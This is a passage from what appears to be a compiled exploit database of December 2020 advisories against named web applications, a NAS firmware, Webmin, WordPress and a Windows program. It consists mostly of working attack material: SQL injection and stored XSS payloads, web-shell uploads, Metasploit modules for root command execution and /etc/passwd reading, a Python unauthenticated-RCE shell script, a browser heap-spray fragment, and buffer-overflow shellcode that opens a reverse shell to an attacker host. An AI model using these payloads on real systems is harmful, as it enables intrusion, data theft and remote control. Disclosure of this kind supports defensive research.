document.body.appendChild(textarea_div_elem); textarea_div_elem.id = "div1"; var element = document.createElement("textarea"); /* Add a style to avoid textarea display */ element.style.cssText = 'display:block-inline;height:1px;width:1px;visibility:hidden;'; /* * This spray is not perfect, "element.cloneNode" will trigger a fastMalloc * allocation of the node attributes and an IsoHeap allocation of the * Element. The virtual page layout will look something like that: * [IsoHeap] [fastMalloc] [IsoHeap] [fastMalloc] [IsoHeap] [...] */ for (let i = 0; i < SPRAY_ELEM_SIZE; i++) textarea_div_elem.appendChild(element.cloneNode()); } /* StringImpl Spray */ function sprayStringImpl(start, end) { for (let i = start; i < end; i++) { let s = new String("A".repeat(LENGTH_TIMER - LENGTH_STRINGIMPL - 5) + i.toString().padStart(5, "0")); g_obj_str[s] = 0x1337; } } function go() { /* Init spray */ sprayHTMLTextArea(); g_input = input1; /* Shape heap layout for obj. reuse */ prepareUAF(); }

# Exploit Title: Victor CMS 1.0 - File Upload To RCE # Date: 20.12.2020 # Exploit Author: Mosaaed # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Tested on: Apache2/Linux Step1: register http://localhost/CMSsite-master/register.php step2: login as user step3: Go to Profile step4: upload imag as php file (upload shell.php) step5: update user step6: You will find your shell in img folder :/path/img/cmd.php http://localhost/CMSsite-master/img/cmd.php?cmd=id uid=33(www-data) gid=33(www-data) groups=33(www-data)

# Exploit Title: Library Management System 3.0 - "Add Category" Stored XSS # Exploit Author: Kislay Kumar # Date: 2020-12-22 # Google Dork: N/A # Vendor Homepage: https://otsglobal.org/ # Software Link: https://codecanyon.net/item/library-management-system-22/16965307 # Affected Version: 3.0 # Patched Version: Unpatched # Category: Web Application # Tested on: Kali Linux Step 1. Login as Admin. Step 2. Select "Book" from menu and select "Categories" from sub menu and after that click on "Add Category". Step 3. Insert payload - "><img src onerror=alert(1)> in "Category Name" Step 4. Now Click on "Save" , Go to "Category" and See last , there you will get alert box.

# Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated) # Date: 12-21-2020 # Exploit Author: Matthew Aberegg, Alex Prieto # Vendor Homepage: https://pandorafms.com/ # Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c # Software Link: https://pandorafms.com/community/get-started/ # Version: Pandora FMS 7.0 NG 750 # Tested on: Ubuntu 18.04 # Vulnerability Details # Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS. # Vulnerable Parameter : network_csv # POC POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119 Content-Length: 1597 Origin: http://TARGET Connection: close Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3 Upgrade-Insecure-Requests: 1 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="interval_manual_defined" 1 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="interval_select" 300 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="interval_text" 0 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="interval" 0 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="interval_units" 1 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="taskname" test -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="id_recon_server" 3 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="network_csv_enabled" on -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="network_csv"; filename="test.txt" Content-Type: text/plain ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="network" -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="comment" test -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="submit" Next -----------------------------308827614039434535382911921119--

# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection # Date : 2020-12-21 # Author : Musyoka Ian # Version : CSE Bookstore 1.0 # Vendor Homepage: https://projectworlds.in/ # Platform : PHP # Tested on : Debian CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database the web appliction is running on Below is results returned by SQLMap Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138# Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT POC 1 REQUEST ======== GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1 Host: 192.168.196.83 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n Upgrade-Insecure-Requests: 1 RESPONSE ======== HTTP/1.1 200 OK Date: Mon, 21 Dec 2020 20:09:49 GMT Server: Apache/2.4.38 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 172 Connection: close Content-Type: text/html; charset=UTF-8 Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1 POC 2 Also the web application is vulnerable to a SQL Injection on cart.php file by sending a sql injection payload in bookisbn post data parameter REQUEST ======= POST /ebook/cart.php HTTP/1.1 Host: 192.168.196.83 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Connection: close Cache-Control: max-age=0 Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4 Content-Type: application/x-www-form-urlencoded Content-Length: 57 Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9 bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart RESPONSE ======= get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1 POC 3. Lastly bookisbn parameter on book.php is vunerable to SQL Injection which also has a High servierity since it could lead to dumping of database credentials REQUEST ======= GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1 Host: 192.168.196.83 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Connection: close Cache-Control: max-age=0 Referer: http://192.168.196.83/ebook/books.php Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on RESPONSE ======== HTTP/1.1 200 OK Date: Mon, 21 Dec 2020 20:47:58 GMT Server: Apache/2.4.38 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 188 Connection: close Content-Type: text/html; charset=UTF-8 Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1

# Exploit Title: Multi Branch School Management System 3.5 - "Create Branch" Stored XSS # Exploit Author: Kislay Kumar # Date: 2020-12-21 # Google Dork: N/A # Vendor Homepage: https://www.ramomcoder.com/ # Software Link: https://codecanyon.net/item/ramom-multi-branch-school-management-system/25182324 # Affected Version: 3.5 # Category: Web Application # Tested on: Kali Linux Step 1. Login as Super Admin. Step 2. Select "Branch" from menu and after that click on "Create Branch". Step 3. Insert payload - "><img src onerror=alert(1)> in "Branch Name" , "School Name" , "Mobile No." , "Currency" , "Symbol" , "City" and "State". Step 4. Now Click on "Save" and you will get a list of alert boxes.

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Webmin 1.962 - Package Update Escape Bypass RCE (Metasploit)', 'Description' => %q( This module exploits an arbitrary command execution vulnerability in Webmin 1.962 and lower versions. Any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges. It emerged by circumventing the measure taken for CVE-2019-12840. s/\\(-)|\\(.)/string/g; escape is not enough for prevention. Therefore, since the package name variable is placed directly in the system command, we can manipulate it using some escape characters that HTTP supports. For example, we can escape control by dropping the command line down one line. We can do this with "%0A" and "%0C" urlencoded row values.Also, for paylad to work correctly, we must add double an ampersand(&&) to the end of the payload (%26%26) ), 'Author' => [ 'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', 'CVE-2020-35606'], ['URL', 'https://www.pentest.com.tr/exploits/Webmin-1962-PU-Escape-Bypass-Remote-Command-Execution.html'] ], 'Privileged' => true, 'Payload' => { 'DisableNops' => true, 'Space' => 512, 'Compat' => { 'PayloadType' => 'cmd' } }, 'DefaultOptions' => { 'RPORT' => 10000, 'SSL' => false, 'PAYLOAD' => 'cmd/unix/reverse_perl' }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [['Webmin <= 1.962', {}]], 'DisclosureDate' => '2020-12-21', 'DefaultTarget' => 0) ) register_options [ OptString.new('USERNAME', [true, 'Webmin Username']), OptString.new('PASSWORD', [true, 'Webmin Password']), OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/']) ] end def peer "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" end def login res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'session_login.cgi'), 'cookie' => 'testing=1', # it must be used for "Error - No cookies" 'vars_post' => { 'page' => '', 'user' => datastore['USERNAME'], 'pass' => datastore['PASSWORD'] } }) if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/ return $1 end return nil unless res '' end def check cookie = login return CheckCode::Detected if cookie == '' return CheckCode::Unknown if cookie.nil? vprint_status('Attempting to execute...') # check version res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "sysinfo.cgi"), 'cookie' => "sid=#{cookie}", 'vars_get' => { "xnavigation" => "1" } }) if res && res.code == 302 && res.body version = res.body.split("Webmin 1.")[1] return CheckCode::Detected if version.nil? version = version.split(" ")[0] if version <= "962" # check package update priv res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "package-updates/"), 'cookie' => "sid=#{cookie}" }) if res && res.code == 200 && res.body =~ /Software Package Update/ print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<") return CheckCode::Vulnerable end end end print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<") print_status("Please try with another user account!") CheckCode::Safe end def exploit cookie = login if cookie == '' || cookie.nil? fail_with(Failure::Unknown, 'Failed to retrieve session cookie') end print_good("Session cookie: #{cookie}") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'), 'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" }, 'cookie' => "sid=#{cookie}" ) unless res && res.code == 200 fail_with(Failure::Unknown, 'Request failed') end print_status("Attempting to execute the payload...") run_update(cookie) end def run_update(cookie) @b64p = Rex::Text.encode_base64(payload.encoded) perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"' payload = Rex::Text.uri_encode(perl_payload) res = send_request_cgi( { 'method' => 'POST', 'cookie' => "sid=#{cookie}", 'ctype' => 'application/x-www-form-urlencoded', 'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'), 'headers' => { 'Referer' => "#{peer}/package-updates/?xnavigation=1" }, # new vector // bypass to backslash %0A%7C{}%26%26 'data' => "redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26" # for CVE-2019-12840 #'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages" }) end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework # ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress W3 Total Cache File Read Vulnerability', 'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability in WordPress plugin 'W3 Total Cache' version 0.9.2.6-0.9.3, allowing arbitrary file read with the web server privileges. }, 'References' => [ ['CVE', '2019-6715'], ['WPVDB', '9248'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'], ['URL','https://vinhjaxt.github.io/2019/03/cve-2019-6715'], ], 'Author' => [ 'VinhJAXT', # Vulnerability discovery 'Hoa Nguyen - SunCSR Team' # Metasploit module ], 'DisclosureDate' => '2014-09-20', 'License' => MSF_LICENSE ) ) register_options( [ OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 2]) ] ) end def check check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26') end def run_host(ip) traversal = '../' * datastore['DEPTH'] filename = datastore['FILEPATH'] filename = filename[1, filename.length] if filename =~ %r{^/} json_body = { 'Type' => "SubscriptionConfirmation", 'Message' => '', 'SubscribeURL' => "file:///#{traversal}#{filename}" } res = send_request_cgi({ 'method' => 'PUT', 'uri' => normalize_uri(wordpress_url_plugins, 'w3-total-cache', 'pub','sns.php'), 'ctype' => 'application/json', 'data' => JSON.generate(json_body) }) fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' unless res.code == 200 fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? print_status('Downloading file...') print_line("\n#{res.body}\n") fname = datastore['FILEPATH'] path = store_loot( 'w3_total_cache.traversal', 'text/plain', ip, res.body, fname ) print_good("File saved in: #{path}") end end

# Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection # Exploit Author: Vijay Sachdeva # Date: 2020-12-22 # Vendor Homepage: https://www.sourcecodester.com/php/14634/artworks-gallery-management-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14634&title=Artworks+Gallery+Management+System+in+PHP+with+Full+Source+Code # Affected Version: Version 1 # Tested on Kali Linux Step 1. Log in to the application with admin credentials. Step 2. Click on "Explore" and then select "Artworks". Step 3. Choose any item, the URL should be " http://localhost/art-bay/info_art.php?id=6 Step 4. Run sqlmap on the URL where the "id" parameter is given sqlmap -u "http://192.168.1.240/art-bay/info_art.php?id=8" --banner --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=8 AND 4531=4531 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: id=8 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627171,0x63435455546f41476e584f4a66614e445968714d427647756f6f48796153686e756f66715875466c,0x716a6b6b71)-- - --- [08:18:34] [INFO] the back-end DBMS is MySQL [08:18:34] [INFO] fetching banner back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) banner: '10.3.24-MariaDB-2' --- Step 5. Sqlmap should inject the web-app successfully which leads to information disclosure.

# Exploit Title: TerraMaster TOS 4.2.06 - RCE (Unauthenticated) # Date: 12/12/2020 # Exploit Author: IHTeam # Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ # Vendor Homepage: https://www.terra-master.com/ # Version: <= 4.2.06 # Tested on: 4.1.30, 4.2.06 #!/usr/bin/env python3 import argparse import requests import time import sys import urllib.parse from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) parser = argparse.ArgumentParser(description="TerraMaster TOS <= 4.2.06 Unauth RCE") parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8081/") args = parser.parse_args() url = args.url headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'} epoch_time = int(time.time()) shell_filename = "debug"+str(epoch_time)+".php" def check_endpoint(url, headers): response = requests.get(url+'/version', headers=headers, verify=False) if response.status_code == 200: print("[+] TerraMaster TOS version: ", str(response.content)) else: print("\n[-] TerraMaster TOS response code: ", response.status_code) sys.exit() def upload_shell(url, headers, shell_filename): payload = "http|echo \"<?php echo(passthru(\\$_GET['cmd']));?>\" >> /usr/www/"+shell_filename+" && chmod +x /usr/www/"+shell_filename+"||" payload = urllib.parse.quote(payload, safe='') print("[/] Uploading shell...") response = requests.get(url+'/include/makecvs.php?Event='+payload, headers=headers, verify=False) time.sleep(1) response = requests.get(url+'/'+shell_filename+'?cmd=id', headers=headers, verify=False) if ('uid=0(root) gid=0(root)' in str(response.content, 'utf-8')): print("[+] Upload succeeded") else: print("\n[-] Error uploading shell: ", response.content) sys.exit() def interactive_shell(url, headers, shell_filename, cmd): response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(cmd, safe=''), headers=headers, verify=False) print(str(response.text)+"\n") def delete_shell(url, headers, shell_filename): delcmd = "rm /usr/www/"+shell_filename response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(delcmd, safe=''), headers=headers, verify=False) print("\n[+] Shell deleted") check_endpoint(url, headers) upload_shell(url, headers, shell_filename) try: while True: cmd = input("# ") interactive_shell(url, headers, shell_filename, cmd) except: delete_shell(url, headers, shell_filename)

# Exploit Title: Faculty Evaluation System 1.0 - Stored XSS # Exploit Author: Vijay Sachdeva (pwnshell) # Date: 2020-12-22 # Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14635&title=Faculty+Evaluation+System+using+PHP%2FMySQLi+with+Source+Code # Tested on Kali Linux Step 1: Log in to the application with admin credentials Step 2: Click on Questionnaires, then click "Action" for any Academic Year and then click manage. Step 3. Input "<script>alert("pwnshell")</script>" in "Question" field of the Question form. Step 4. Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on Questionnaires, click action for any academic year, and then manage, your XSS Payloads will be triggered for that "Academic Year"

# Exploit Title: Class Scheduling System 1.0 - Multiple Stored XSS # Exploit Author: Aakash Madaan (Godsky) # Date: 2020-12-22 # Vendor Homepage: https://www.sourcecodester.com/php/5175/class-scheduling-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=5175&title=Class+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: Parrot OS [+] Step 1. Login to the application with admin credentials [+] Step 2.1(a). Click on "Department" page. {Uri :http(s)://<host>/admin/department.php} Step 2.1(b). In the "Person Incharge" field, use XSS payload '"><script>alert("Department")</script>' as the name of new course and click on save. [ Note : The XSS can also be triggered if we put the same payload in "Title" field ] Step 2.1(c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Department", your XSS Payloads will be triggered. [+] Step 2.2(a). Click on "Subject" page. {Uri :http(s)://<host>/admin/subject.php} Step 2.2(b). In the "Subject Code" field, use XSS payload '"><script>alert("Subject")</script>' as the name of new course and click on save. [ Note : The XSS can also be triggered if we put the same payload in "Title" field ] Step 2.2(c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Subject", your XSS Payloads will be triggered. [+] Step 2.3(a). Click on "Course" page. {Uri : http(s)://<host>/admin/course.php} Step 2.3(b). In the "Course Year" field, use XSS payload '"><script>alert("Course")</script>' as the name of new course and click on save. [ Note : The XSS can also be triggered if we put the same payload in "Major" field ] Step 2.3(c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Course", your XSS Payloads will be triggered. [+] Step 2.3(a). Click on "Record" page. {Uri :http(s)://<host>/admin/record.php} Step 2.3(b). In the "Name" field, use XSS payload '"><script>alert("Record")</script>' as the name of new course and click onsave. [ Note : The XSS can also be triggered if we put the same payload in "Academic Rank" or "Designation" field ] Step 2.3(c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Record", your XSS Payloads will be triggered. [+] Step 3. This should trigger the XSS payload and anytime you click on respective pages, your stored XSS payload will be triggered.

# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH) # Date: 2020-12-22 # Exploit Author: Florian Gassner # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe # Version: 9.05 # Tested on: Windows 10 x64 # Computer -> From Text File -> Choose exploit.txt import struct """ Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214 """ OFFSET = 214 """ badchars = '\x00\x09\x0a\x0d\x3a\x5c' """ """ Log data, item 23 Address=01015AF4 Message= 0x01015af4 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READWRITE} [NetworkInventoryExplorer.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\NetworkInventoryExplorer.exe """ pop_pop_ret = struct.pack("<I", 0x01015af4) short_jump = '\xEB\x06\x90\x90' """ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.19.129 LPORT=443 -f python -v shellcode -b "\x00\x09\x0a\x0d\x3a\x5c" EXITFUNC=thread """ shellcode = "" shellcode += "\xda\xc7\xba\xee\x50\x53\xe0\xd9\x74\x24\xf4" shellcode += "\x5d\x33\xc9\xb1\x52\x83\xed\xfc\x31\x55\x13" shellcode += "\x03\xbb\x43\xb1\x15\xbf\x8c\xb7\xd6\x3f\x4d" shellcode += "\xd8\x5f\xda\x7c\xd8\x04\xaf\x2f\xe8\x4f\xfd" shellcode += "\xc3\x83\x02\x15\x57\xe1\x8a\x1a\xd0\x4c\xed" shellcode += "\x15\xe1\xfd\xcd\x34\x61\xfc\x01\x96\x58\xcf" shellcode += "\x57\xd7\x9d\x32\x95\x85\x76\x38\x08\x39\xf2" shellcode += "\x74\x91\xb2\x48\x98\x91\x27\x18\x9b\xb0\xf6" shellcode += "\x12\xc2\x12\xf9\xf7\x7e\x1b\xe1\x14\xba\xd5" shellcode += "\x9a\xef\x30\xe4\x4a\x3e\xb8\x4b\xb3\x8e\x4b" shellcode += "\x95\xf4\x29\xb4\xe0\x0c\x4a\x49\xf3\xcb\x30" shellcode += "\x95\x76\xcf\x93\x5e\x20\x2b\x25\xb2\xb7\xb8" shellcode += "\x29\x7f\xb3\xe6\x2d\x7e\x10\x9d\x4a\x0b\x97" shellcode += "\x71\xdb\x4f\xbc\x55\x87\x14\xdd\xcc\x6d\xfa" shellcode += "\xe2\x0e\xce\xa3\x46\x45\xe3\xb0\xfa\x04\x6c" shellcode += "\x74\x37\xb6\x6c\x12\x40\xc5\x5e\xbd\xfa\x41" shellcode += "\xd3\x36\x25\x96\x14\x6d\x91\x08\xeb\x8e\xe2" shellcode += "\x01\x28\xda\xb2\x39\x99\x63\x59\xb9\x26\xb6" shellcode += "\xce\xe9\x88\x69\xaf\x59\x69\xda\x47\xb3\x66" shellcode += "\x05\x77\xbc\xac\x2e\x12\x47\x27\x91\x4b\x54" shellcode += "\x36\x79\x8e\x5a\x39\xc1\x07\xbc\x53\x25\x4e" shellcode += "\x17\xcc\xdc\xcb\xe3\x6d\x20\xc6\x8e\xae\xaa" shellcode += "\xe5\x6f\x60\x5b\x83\x63\x15\xab\xde\xd9\xb0" shellcode += "\xb4\xf4\x75\x5e\x26\x93\x85\x29\x5b\x0c\xd2" shellcode += "\x7e\xad\x45\xb6\x92\x94\xff\xa4\x6e\x40\xc7" shellcode += "\x6c\xb5\xb1\xc6\x6d\x38\x8d\xec\x7d\x84\x0e" shellcode += "\xa9\x29\x58\x59\x67\x87\x1e\x33\xc9\x71\xc9" shellcode += "\xe8\x83\x15\x8c\xc2\x13\x63\x91\x0e\xe2\x8b" shellcode += "\x20\xe7\xb3\xb4\x8d\x6f\x34\xcd\xf3\x0f\xbb" shellcode += "\x04\xb0\x30\x5e\x8c\xcd\xd8\xc7\x45\x6c\x85" shellcode += "\xf7\xb0\xb3\xb0\x7b\x30\x4c\x47\x63\x31\x49" shellcode += "\x03\x23\xaa\x23\x1c\xc6\xcc\x90\x1d\xc3" payload = 'A' * (OFFSET - len(short_jump)) payload += short_jump payload += pop_pop_ret payload += '\x90' * 8 payload += shellcode f = open("exploit.txt", "w") f.write(payload) f.close()

# Exploit Title: Online Learning Management System 1.0 - Authentication Bypass # Exploit Author: Aakash Madaan (Godsky) # Date: 2020-12-22 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: Parrot OS # Description: Easy authentication bypass vulnerability on the application allows an attacker to log in as the registered user without password. Step 1: Go to http://localhost/ and register a new user or try to login as already registered user (Ubas). Step 2: On the login page, use query { Ubas' or '1'='1 } as username Step 2: On the login page, use same query { Ubas' or '1'='1 } as password All set you should be logged in as Ubas.

# Exploit Title: Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS # Exploit Author: Vijay Sachdeva (pwnshell) # Date: 2020-12-23 # Vendor Homepage: https://www.sourcecodester.com/php/11238/sales-and-inventory-system-grocery-store.html # Software Link: https://www.sourcecodester.com/download-code?nid=11238&title=Sales+and+Inventory+System+for+Grocery+Store+using+PHP%2FPDO+Full+Source+Code # Tested on Kali Linux Step 1: Log in to the application with admin credentials Step 2: Click on "Customer" on the left side, then click "Add Customer". Step 3. Input "<IMG """><SCRIPT>alert("XSS")</SCRIPT>">" in "First Name" field of the "Add Customer" form. Step 4. Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on the "Customer" page, your XSS payload will be triggered. Note: Stored XSS can also be found on the "Product" page, select any product and then go to "Action" to edit it. Input your payload "<IMG"""><SCRIPT>alert("XSS")</SCRIPT>">" in any of the field and your XSS payload will trigger.

# Exploit Title: Online Learning Management System 1.0 - Multiple Stored XSS # Exploit Author: Aakash Madaan (Godsky) # Date: 2020-12-22 # Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: Parrot OS [+] Step 1. Login to the application with admin credentials [+] Step 2.1 (a). Click on "Subject" page. {Uri :http(s)://<host>/admin/subject.php} (b). Now click on the "Add Subject" button to add a new subject. (c). In the "Subject Title" field, use XSS payload '"><script>alert("subject")</script>' as the name of new course (Also fill the respective sections if required). (d). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Subject" section, your XSS Payloads will be triggered. [+] Step 2.2 (a). Click on "Class" page. {Uri : http(s)://<host>/admin/class.php} (b). Under the "Add class" in the "Class Name" field, use XSS payload '"><script>alert("class")</script>' as the name of new course. (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Class" section, your XSS Payloads will be triggered. [+] Step 2.3 (a). Click on "Admin Users" page. {Uri :http(s)://<host>/admin/admin_user.php} (b). Under the "Add user" in the "First Name" field, use XSS payload '"><script>alert("Admin User")</script>' as the name of new course (Also fill the respective sections if required). [ Note : The XSS can also be triggered if we put the same payload in "Last Name" or "Username" fields ] (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Admin Users", your XSS Payloads will be triggered. [+] Step 2.4 (a). Click on "Department" page. {Uri :http(s)://<host>/admin/department.php} (b). In the "Department" field, use XSS payload '"><script>alert("Department")</script>' as the name of new course (Also fill the respective sections if required). [ Note : The XSS can also be triggered if we put the same payload in "Person Incharge" field ] (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Department", your XSS Payloads will be triggered. [+] Step 2.5 (a). Click on "Students" page. {Uri 